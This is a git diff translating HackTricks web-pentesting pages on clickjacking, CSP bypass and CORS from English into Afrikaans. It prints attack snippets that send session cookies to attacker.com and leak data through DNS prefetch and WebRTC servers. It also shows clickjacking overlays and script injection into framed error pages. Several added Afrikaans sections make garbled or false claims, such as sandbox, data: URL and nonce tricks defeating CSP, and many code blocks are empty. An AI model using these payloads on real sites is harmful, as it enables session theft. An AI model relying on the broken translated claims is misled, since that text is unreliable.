+'n Veelstapgelaai is 'n tegniek wat gebruik word in clickjacking-aanvalle om 'n gebruiker te mislei om 'n reeks aksies uit te voer sonder dat hy bewus is daarvan. Hierdie tegniek maak gebruik van 'n reeks versteekte kliekareas wat oor mekaar gelê word om die gebruiker te laat dink dat hy op 'n ander element klik as wat hy werklik is.
 
+Die veelstapgelaai bestaan uit die volgende stappe:
+
+1. Die aanvaller skep 'n webwerf wat die inhoud van die teikenwebwerf insluit deur gebruik te maak van 'n iframe-element.
+2. Die aanvaller plaas 'n onsigbare kliekarea oor 'n knoppie of skakel op die teikenwebwerf wat die gebruiker normaalweg sou klik.
+3. Wanneer die gebruiker op die knoppie of skakel klik, word hy eintlik op die onsigbare kliekarea geklik, wat 'n aksie op die teikenwebwerf veroorsaak.
+4. Die aanvaller kan hierdie proses herhaal deur nog versteekte kliekareas oor ander elemente op die teikenwebwerf te plaas, wat die gebruiker verder mislei om aksies uit te voer sonder sy medewete.
+
+Hierdie tegniek kan gebruik word om verskeie skadelike aksies uit te voer, soos die stel van gebruikersinstellings, die uitvoer van transaksies of die deel van persoonlike inligting sonder die gebruiker se toestemming. Dit is belangrik vir webontwikkelaars om bewus te wees van hierdie aanvalstegniek en maatreëls te tref om dit te voorkom.
 ```markup
 
 
Click me first

 
Click me next

 
 ```
+### Sleep\&Laai + Klik lading
 
-### Drag\&Drop + Click payload
+Hierdie tegniek maak gebruik van 'n kombinasie van sleep en laai en kliek om 'n clickjacking-aanval uit te voer. Die aanval maak gebruik van 'n onsigbare oorlê-element wat die gebruiker mislei om op 'n skadelike knoppie te klik sonder dat hy dit besef.
 
+#### Metode
+
+1. Skep 'n oorlê-element wat die volle skerm bedek en 'n skadelike knoppie bevat.
+2. Stel die oorlê-element se deursigtigheid in op 0% sodat dit onsigbaar is vir die gebruiker.
+3. Plaas die oorlê-element oor 'n onskadelike knoppie of skakel wat die gebruiker verwag om op te klik.
+4. Skep 'n sleep-en-laai-gebeurtenis wat geaktiveer word wanneer die gebruiker op die onskadelike knoppie klik.
+5. Tydens die sleep-en-laai-gebeurtenis, skuif die oorlê-element oor die skadelike knoppie.
+6. Wanneer die gebruiker die muisknop loslaat, sal die oorlê-element oor die skadelike knoppie wees en die aanval sal uitgevoer word.
+
+#### Voorbeeld
+
+```html
+
+
+
+
+
+
+

+  
Skadelike Knoppie

+

+
Onskadelike Knoppie

+
+
+
+```
+
+In hierdie voorbeeld sal die gebruiker verwag om op die groen "Onskadelike Knoppie" te klik. Wanneer die gebruiker die knoppie klik, sal die oorlê-element oor die rooi "Skadelike Knoppie" skuif en die aanval sal uitgevoer word sonder dat die gebruiker dit besef.
 ```markup
 
 
@@ -113,105 +208,96 @@ background: #F00;
 
 
 ```
+### XSS + Klikverleiding
 
-### XSS + Clickjacking
+As jy 'n **XSS-aanval geïdentifiseer het wat vereis dat 'n gebruiker op 'n element klik** om die XSS te **aktiveer** en die bladsy is **kwesbaar vir klikverleiding**, kan jy dit misbruik om die gebruiker te mislei om op die knoppie/skakel te klik.\
+Voorbeeld:\
+_Jy het 'n **self XSS** gevind in sekere privaat besonderhede van die rekening (besonderhede wat **slegs jy kan instel en lees**). Die bladsy met die **vorm** om hierdie besonderhede in te stel is **kwesbaar** vir **klikverleiding** en jy kan die **vorm** vooraf vul met die GET parameters._\
+__'n Aanvaller kan 'n **klikverleiding**-aanval vir daardie bladsy voorberei deur die **vorm** vooraf te vul met die **XSS-payload** en die **gebruiker te mislei** om die **vorm in te dien**. So, **wanneer die vorm ingedien word** en die waardes gewysig word, sal die **gebruiker die XSS uitvoer**.
 
-If you have identified an **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.\
-Example:\
-_You found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set these details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with the GET parameters._\
-\_\_An attacker could prepare a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submitted** and the values are modified, the **user will execute the XSS**.
+## Strategieë om Klikverleiding te Verminder
 
-## Strategies to Mitigate Clickjacking
+### Kliëntkant Verdediging
 
-### Client-Side Defenses
+Skripte wat aan die kliëntkant uitgevoer word, kan aksies uitvoer om Klikverleiding te voorkom:
 
-Scripts executed on the client side can perform actions to prevent Clickjacking:
+* Verseker dat die aansoekvenster die hoofvenster is.
+* Maak alle rame sigbaar.
+* Voorkom kliek op onsigbare rame.
+* Ontdek en waarsku gebruikers vir moontlike Klikverleiding-pogings.
 
-* Ensuring the application window is the main or top window.
-* Making all frames visible.
-* Preventing clicks on invisible frames.
-* Detecting and alerting users to potential Clickjacking attempts.
-
-However, these frame-busting scripts may be circumvented:
-
-* **Browsers' Security Settings:** Some browsers might block these scripts based on their security settings or lack of JavaScript support.
-* **HTML5 iframe `sandbox` Attribute:** An attacker can neutralize frame buster scripts by setting the `sandbox` attribute with `allow-forms` or `allow-scripts` values without `allow-top-navigation`. This prevents the iframe from verifying if it is the top window, e.g.,
+Hierdie raam-breuk skripte kan egter omseil word:
 
+* **Webblaaier se Sekuriteitsinstellings:** Sommige webblaaier kan hierdie skripte blokkeer gebaseer op hul sekuriteitsinstellings of gebrek aan JavaScript-ondersteuning.
+* **HTML5 iframe `sandbox` Eienskap:** 'n Aanvaller kan raam-breuk skripte neutraliseer deur die `sandbox` eienskap in te stel met `allow-forms` of `allow-scripts` waardes sonder `allow-top-navigation`. Dit voorkom dat die iframe verifieer of dit die hoofvenster is, bv.,
 ```html
 
 ```
+Die `allow-forms` en `allow-scripts` waardes maak aksies binne die iframe moontlik terwyl top-level navigasie uitgeskakel word. Om die beoogde funksionaliteit van die geteikende webwerf te verseker, mag addisionele toestemmings soos `allow-same-origin` en `allow-modals` nodig wees, afhangende van die tipe aanval. Blaaierkonsole-boodskappe kan aandui watter toestemmings toegelaat moet word.
 
-The `allow-forms` and `allow-scripts` values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like `allow-same-origin` and `allow-modals` might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.
-
-### Server-Side Defenses
+### Bedienerkant-verdedigings
 
 #### X-Frame-Options
 
-The **`X-Frame-Options` HTTP response header** informs browsers about the legitimacy of rendering a page in a `` or `
+```
+
+Hierdie voorbeeld wys hoe om die CSP te omseil deur die `sandbox`-kenmerk te gebruik. Die `sandbox`-waarde van `allow-scripts` laat toe dat skripte binne die `iframe`-element uitgevoer word, selfs as dit teenstrydig is met die beleid van die omliggende webbladsy.
+
+- Bypassing via `data:` URL:
+
+```html
+
+```
+
+Hierdie voorbeeld wys hoe om die CSP te omseil deur die `data:`-URL-skema te gebruik. Die skripskakel verwys na 'n data-URL wat die skripskode bevat. Hierdie omseiling laat toe dat die skripskode uitgevoer word, selfs as dit nie toegelaat word volgens die beleid nie.
+
+- Bypassing via `nonce` attribute:
+
+```html
+
+```
+
+Hierdie voorbeeld wys hoe om die CSP te omseil deur die `nonce`-kenmerk te gebruik. Die `nonce`-waarde moet ooreenstem met die waarde wat deur die webwerf se beleid gespesifiseer word. Hierdie omseiling laat toe dat die skripskakel gelaai word, selfs as dit nie toegelaat word volgens die beleid nie.
 ```xml
 
 ```
+### Koptekste
 
-### Headers
+CSP kan afgedwing of gemonitor word deur middel van hierdie koptekste:
 
-CSP can be enforced or monitored using these headers:
+* `Content-Security-Policy`: Dwang die CSP af; die blaaier blokkeer enige oortredings.
+* `Content-Security-Policy-Report-Only`: Word gebruik vir monitering; rapporteer oortredings sonder om dit te blokkeer. Ideaal vir toetsing in pre-produksie omgewings.
 
-* `Content-Security-Policy`: Enforces the CSP; the browser blocks any violations.
-* `Content-Security-Policy-Report-Only`: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments.
-
-### Defining Resources
-
-CSP restricts the origins for loading both active and passive content, controlling aspects like inline JavaScript execution and the use of `eval()`. An example policy is:
+### Definisie van Hulpbronne
 
+CSP beperk die oorspronge vir die laai van beide aktiewe en passiewe inhoud, en beheer aspekte soos inline JavaScript-uitvoering en die gebruik van `eval()`. 'n Voorbeeldbeleid is:
 ```bash
 default-src 'none';
 img-src 'self';
@@ -69,62 +102,54 @@ frame-src 'self' https://ic.paypal.com https://paypal.com;
 media-src https://videos.cdn.mozilla.net;
 object-src 'none';
 ```
+### Riglyne
 
-### Directives
-
-* **script-src**: Allows specific sources for JavaScript, including URLs, inline scripts, and scripts triggered by event handlers or XSLT stylesheets.
-* **default-src**: Sets a default policy for fetching resources when specific fetch directives are absent.
-* **child-src**: Specifies allowed resources for web workers and embedded frame contents.
-* **connect-src**: Restricts URLs which can be loaded using interfaces like fetch, WebSocket, XMLHttpRequest.
-* **frame-src**: Restricts URLs for frames.
-* **frame-ancestors**: Specifies which sources can embed the current page, applicable to elements like ``, ` // The bot will load an URL with the payload
 
 ```
+### Via Bladwijzers
 
-### Via Bookmarklets
+Hierdie aanval vereis 'n bietjie sosiale ingenieurswese waar die aanvaller die gebruiker oortuig om 'n skakel oor die bladwijzer van die webblaaier te sleep en te laat val. Hierdie bladwijzer sal **boosaardige javascript**-kode bevat wat uitgevoer sal word in die konteks van die huidige webvenster, **CSP omseil en die diefstal van sensitiewe inligting soos koekies of tokens toelaat**.
 
-This attack would imply some social engineering where the attacker **convinces the user to drag and drop a link over the bookmarklet of the browser**. This bookmarklet would contain **malicious javascript** code that when drag\&dropped or clicked would be executed in the context of the current web window, **bypassing CSP and allowing to steal sensitive information** such as cookies or tokens.
+Vir meer inligting [**kyk die oorspronklike verslag hier**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
 
-For more information [**check the original report here**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
+### CSP-omseiling deur beperking van CSP
 
-### CSP bypass by restricting CSP
+In [**hierdie CTF-verslag**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution) word CSP omseil deur 'n meer beperkende CSP in te spuit binne 'n toegelate ifram wat die laai van 'n spesifieke JS-lêer verbied. Hierdie lêer maak dit dan moontlik om deur middel van **prototipeverontreiniging** of **dom-verontreiniging** 'n ander skrip te misbruik om 'n willekeurige skrip te laai.
 
-In [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP is bypassed by injecting inside an allowed iframe a more restrictive CSP that disallowed to load a specific JS file that, then, via **prototype pollution** or **dom clobbering** allowed to **abuse a different script to load an arbitrary script**.
-
-You can **restrict a CSP of an Iframe** with the **`csp`** attribute:
+Jy kan **'n CSP van 'n Iframe beperk** met die **`csp`**-eienskap:
 
 {% code overflow="wrap" %}
 ```html
@@ -589,183 +638,161 @@ You can **restrict a CSP of an Iframe** with the **`csp`** attribute:
 ```
 {% endcode %}
 
-In [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), it was possible via **HTML injection** to **restrict** more a **CSP** so a script preventing CSTI was disabled and therefore the **vulnerability became exploitable.**\
-CSP can be made more restrictive using **HTML meta tags** and inline scripts can disabled **removing** the **entry** allowing their **nonce** and **enable specific inline script via sha**:
-
+In [**hierdie CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), was dit moontlik deur **HTML-injectie** om 'n **CSP** meer te **beperk**, sodat 'n skrip wat CSTI voorkom, gedeaktiveer is en dus die **kwesbaarheid uitbuitbaar geword het.**\
+CSP kan meer beperkend gemaak word deur gebruik te maak van **HTML meta-etikette** en inline-skripte kan gedeaktiveer word deur die **inskrywing** wat hul **nonce** toelaat te **verwyder** en **spesifieke inline-skrip te aktiveer via sha**:
 ```html
 
 ```
+### JS uitlekking met Content-Security-Policy-Report-Only
 
-### JS exfiltration with Content-Security-Policy-Report-Only
+As jy kan slaag om die bediener te laat reageer met die kop **`Content-Security-Policy-Report-Only`** met 'n **waarde wat deur jou beheer word** (dalk as gevolg van 'n CRLF), kan jy dit laat wys na jou bediener en as jy die **JS-inhoud** wat jy wil uitlek, **omsluit** met **`` note that this **script** will be **loaded** because it's **allowed by 'self'**. Moreover, and because WordPress is installed, an attacker might abuse the **SOME attack** through the **vulnerable** **callback** endpoint that **bypasses the CSP** to give more privileges to a user, install a new plugin...\
-For more information about how to perform this attack check [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
+'n Aanvaller kan daardie eindpunt misbruik om 'n SOME-aanval teen WordPress te **genereer** en dit binne `` in te sluit. Let daarop dat hierdie **script** sal **laai** omdat dit **toegelaat word deur 'self'**. Verder, en omdat WordPress geïnstalleer is, kan 'n aanvaller die **SOME-aanval** misbruik deur die **kwesbare** **terugroep-eindpunt** wat die CSP **omseil** om meer voorregte aan 'n gebruiker te gee, 'n nuwe invoegtoepassing te installeer...
+Vir meer inligting oor hoe om hierdie aanval uit te voer, kyk [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
 
-## CSP Exfiltration Bypasses
+## CSP Uitlekvermyding
 
-If there is a strict CSP that doesn't allow you to **interact with external servers**, there are some things you can always do to exfiltrate the information.
+As daar 'n streng CSP is wat jou nie toelaat om **met eksterne bedieners te kommunikeer nie**, is daar sekere dinge wat jy altyd kan doen om die inligting uit te lek.
 
-### Location
-
-You could just update the location to send to the attacker's server the secret information:
+### Ligging
 
+Jy kan eenvoudig die ligging opdateer om die geheime inligting na die aanvaller se bediener te stuur:
 ```javascript
-var sessionid = document.cookie.split('=')[1]+"."; 
+var sessionid = document.cookie.split('=')[1]+".";
 document.location = "https://attacker.com/?" + sessionid;
 ```
+### Meta-etiket
 
-### Meta tag
-
-You could redirect by injecting a meta tag (this is just a redirect, this won't leak content)
-
+Jy kan omskakel deur 'n meta-etiket in te spuit (dit is net 'n omskakeling, dit sal nie inhoud lek nie)
 ```html
 
 ```
+### DNS Voorafoplossing
 
-### DNS Prefetch
-
-To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.\
-You can indicate a browser to pre-resolve a hostname with: ``
-
-You could abuse this behaviour to **exfiltrate sensitive information via DNS requests**:
+Om bladsye vinniger te laai, sal webblaaier die hostnaam vooraf oplos na IP-adresse en dit vir later gebruik in die kas geplaas word.\
+Jy kan 'n webblaaier aandui om 'n hostnaam vooraf op te los met: ``
 
+Jy kan hierdie gedrag misbruik om **gevoelige inligting te eksfiltreer deur middel van DNS-versoeke**:
 ```javascript
-var sessionid = document.cookie.split('=')[1]+"."; 
+var sessionid = document.cookie.split('=')[1]+".";
 var body = document.getElementsByTagName('body')[0];
 body.innerHTML = body.innerHTML + "";
 ```
-
-Another way:
-
+'n Ander manier:
 ```javascript
 const linkEl = document.createElement('link');
 linkEl.rel = 'prefetch';
 linkEl.href = urlWithYourPreciousData;
 document.head.appendChild(linkEl);
 ```
-
-In order to avoid this from happening the server can send the HTTP header:
-
+Om te voorkom dat dit gebeur, kan die bediener die HTTP-kop stuur:
 ```
 X-DNS-Prefetch-Control: off
 ```
-
 {% hint style="info" %}
-Apparently, this technique doesn't work in headless browsers (bots)
+Dit blyk dat hierdie tegniek nie werk in headless webblaaier (bots) nie.
 {% endhint %}
 
 ### WebRTC
 
-On several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
-
-Actually you can _leak_ informations using a _DNS request_. Check out this code:
+Op verskeie bladsye kan jy lees dat **WebRTC nie die `connect-src` beleid van die CSP nagaan nie**.
 
+Eintlik kan jy inligting _lek_ deur 'n _DNS-versoek_ te gebruik. Kyk na hierdie kode:
 ```javascript
 (async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
 ```
-
-Another option:
-
+'n Ander opsie:'
 ```javascript
 var pc = new RTCPeerConnection({
-  "iceServers":[
-      {"urls":[
-        "turn:74.125.140.127:19305?transport=udp"
-       ],"username":"_all_your_data_belongs_to_us",
-      "credential":"."
-    }]
+"iceServers":[
+{"urls":[
+"turn:74.125.140.127:19305?transport=udp"
+],"username":"_all_your_data_belongs_to_us",
+"credential":"."
+}]
 });
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
-
-## Checking CSP Policies Online
+## Kontroleer CSP-beleide aanlyn
 
 * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
 * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
 
-## Automatically creating CSP
+## Outomaties skep van CSP
 
 [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
 
-## References
+## Verwysings
 
 * [https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/](https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/)
 * [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
@@ -780,29 +807,29 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 
 

 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutvinders van beloningsjagte!
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**Hacking-insigte**\
+Raak betrokke by inhoud wat die opwinding en uitdagings van hackering ondersoek
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**Hack-nuus in werklikheid**\
+Bly op hoogte van die vinnige hackering-wêreld deur middel van werklikheidsnuus en insigte
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**Nuutste aankondigings**\
+Bly ingelig met die nuutste beloningsjagte wat begin en noodsaaklike platformopdaterings
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hackeringstruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
index 66946eba2..3fa52575c 100644
--- a/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
+++ b/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -1,34 +1,29 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-A configuration such as:
-
+'n Konfigurasie soos:
 ```
 Content-Security-Policy: default-src 'self' 'unsafe-inline';
 ```
+Probeer om enige funksies wat kode uitvoer as 'n string verbied. Byvoorbeeld: `eval, setTimeout, setInterval` sal almal geblokkeer word as gevolg van die instelling `unsafe-eval`.
 
-Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval`
+Enige inhoud van eksterne bronne word ook geblokkeer, insluitend beelde, CSS, WebSockets, en veral JS.
 
-Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS
-
-### Via Text & Images
-
-It's observed that modern browsers convert images and texts into HTML to enhance their display (e.g., setting backgrounds, centering, etc.). Consequently, if an image or text file, such as `favicon.ico` or `robots.txt`, is opened via an `iframe`, it's rendered as HTML. Notably, these pages often lack CSP headers and may not include X-Frame-Options, enabling the execution of arbitrary JavaScript from them:
+### Via Tekste & Beelde
 
+Dit is waargeneem dat moderne webblaaier beelde en tekste omskakel na HTML om hul vertoning te verbeter (bv. agtergronde instel, sentrering, ens.). Gevolglik, as 'n beeld of tekslêer, soos `favicon.ico` of `robots.txt`, geopen word deur middel van 'n `iframe`, word dit as HTML weergegee. Dit is belangrik om op te let dat hierdie bladsye dikwels nie CSP-koppe bevat nie en moontlik nie X-Frame-Options insluit nie, wat die uitvoering van willekeurige JavaScript vanaf hulle moontlik maak:
 ```javascript
 frame=document.createElement("iframe");
 frame.src="/css/bootstrap.min.css";
@@ -37,11 +32,9 @@ script=document.createElement('script');
 script.src='//example.com/csp.js';
 window.frames[0].document.head.appendChild(script);
 ```
+### Via Foute
 
-### Via Errors
-
-Similarly, error responses, like text files or images, typically come without CSP headers and might omit X-Frame-Options. Errors can be induced to load within an iframe, allowing for the following actions:
-
+Op dieselfde manier, foutboodskappe soos tekslêers of beelde, kom gewoonlik sonder CSP-koppe en kan X-Frame-Options weglaat. Foute kan geïnduseer word om binne 'n iframe te laai, wat die volgende aksies moontlik maak:
 ```javascript
 // Inducing an nginx error
 frame=document.createElement("iframe");
@@ -61,33 +54,27 @@ document.body.appendChild(frame);
 // Removal of cookies is crucial post-execution
 for(var i=0;i<5;i++){document.cookie=i+"="}
 ```
-
-After triggering any of the mentioned scenarios, JavaScript execution within the iframe is achievable as follows:
-
+Na die aktivering van enige van die genoemde scenario's, is JavaScript-uitvoering binne die iframe moontlik as volg:
 ```javascript
 script=document.createElement('script');
 script.src='//example.com/csp.js';
 window.frames[0].document.head.appendChild(script);
 ```
-
-
-## References
+## Verwysings
 
 * [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

-
-
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md
index 9e60df9d6..ac1e224aa 100644
--- a/pentesting-web/cors-bypass.md
+++ b/pentesting-web/cors-bypass.md
@@ -2,64 +2,63 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## What is CORS?
+## Wat is CORS?
 
-Cross-Origin Resource Sharing (CORS) standard **enables servers to define who can access their assets** and **which HTTP request methods are permitted** from external sources.
+Cross-Origin Resource Sharing (CORS) standaard **stel bedieners in staat om te bepaal wie toegang tot hul bates kan verkry** en **watter HTTP-aanvraagmetodes toegelaat word** vanaf eksterne bronne.
 
-A **same-origin** policy mandates that a **server requesting** a resource and the server hosting the **resource** share the same protocol (e.g., `http://`), domain name (e.g., `internal-web.com`), and **port** (e.g., 80). Under this policy, only web pages from the same domain and port are allowed access to the resources.
